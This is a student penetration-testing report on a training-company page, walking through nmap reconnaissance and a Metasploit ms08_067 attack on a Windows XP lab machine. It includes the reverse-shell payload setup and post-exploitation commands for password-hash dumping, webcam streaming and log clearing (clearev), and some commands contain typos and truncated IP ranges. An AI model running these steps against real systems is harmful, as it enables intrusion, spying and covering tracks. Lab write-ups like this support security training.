Vulnerability Scanning
Vulnerability scanning is an inspection of the potential points of exploit on a computer or network to identify security holes. A vulnerability scan detects and classifies system weaknesses in computers, networks and communications equipment and predicts the effectiveness of countermeasures.
Vulnerability Assessment & Penetration Testing Report on Windows XP 2003 done by ICSS Student Shivanshi Sinha. The full project discussed below:
Assessment Vulnerability & Penetration Testing Report on Windows XP 2003
Project Name: Vulnerability Assessment & Penetration testing on Windows XP 2003
Author Name: Shivanshi Sinha
Publish Date: 24-07-2018
Table of Contents
Reconnaissance
Vulnerability Scanning
Attack and Penetration
Post-Exploitation
Solution & Recommendation
Reconnaissance
First and foremost we gather information about the target machine which we have chosen to be Windows-XP 2003 machine. The target machine is on the same network as the remote host.
After running Nmap scan we see all the live hosts and the command is given below.
- nmap -sV -sP 168.43.1/24
Now, the seperated live ip address which is required is saved in a text file using the command given below :
- nmap -sV -sP 168.43.1/24 > nmap.txt
- cat host.txt | grep “for” | cut –d “ “ –f5 > ip.txt
Then Windows-XP machine is searched by running the script to detect the OS of all the live ip’s.
- nmap -sV -O –iL ip.txt > ss.txt
After searching the target , we will move to the next step.
Vulnerability Scanning
Known vulnerabilities are checked in the searched target. A nmap scan is run to detect the vulnerability in the target.
- nmap -Pn -script vuln 192.168.174.130
Text file is saved.
- nmap -Pn -script vuln 168.174.130 > bst.txt
After scanning we find that the Windows-XP 2003 machine is vulnerable to the vulnerability ms08_067.
Now metasploit is used to exploit .
Attack and Penetration
Msfconsole is used. Hackers all around use metasploit framework that has a huge collection of exploits,payloads and modules .
- Sudo msfconsole
Now we will search for the ms08_067 vulnerability.
- Search ms08_067
Now the following commands are to be executed :
- info exploit/windows/smb/ms08_067_netapi
- use exploit/windows/smb/ms08_067_netapi
Now we see the list of payloads that can perform the attack.
- show payloads
The payload used – windows/meterpreter/reverse_tcp.
- set payload windows/meterpreter/reverse_tcp
- show options
The lhost and rhost is set.
- set rhost 192.168.174.130
- set lhost 192.168.43.11
Post-Exploitation
After getting the meterpreter session, now we can perform following tasks :
- getsystem
- sysinfo
- getuid
- hashdump
- webcam_stream
- download
- cd
- ls
- reboot
To clear the footprints we use
- clearev
SOLUTIONS & RECOMMENDATIONS
- It is important to delete all traces of your personal information if planning to sell hardware.
- Operating system and other software should be updated This way hackers can be prevented from accessing computers through vulnerabilities in outdated programs.
- Attacks can be minimized by keeping the antivirus and anti-malware ,anti-spyware and firewall
- System becomes pone to hacking if connected to open wifi . Vulnerabilities of some routers can never be Encrypted passwords are required to protect the wifi.
Highest Selling Technical Courses of Indian Cyber Security Solutions:
Amazon Web Services Training in Hyderabad
Amazon Web Services Training in Bangalore
Amazon Web Services Training in Bhubaneswar
Summer Training for CSE, IT, BCA & MCA Students
Network Penetration Testing training
Certified Network Penetration Tester
Diploma in Web Application Security
Certified Web Application Penetration Tester
Certified Android Penetration Tester
Cybersecurity services that can protect your company:
Web Security | Web Penetration Testing
Network Penetration Testing – NPT
Android App Penetration Testing
Other Location for Online Courses:
WhatsApp Live Chat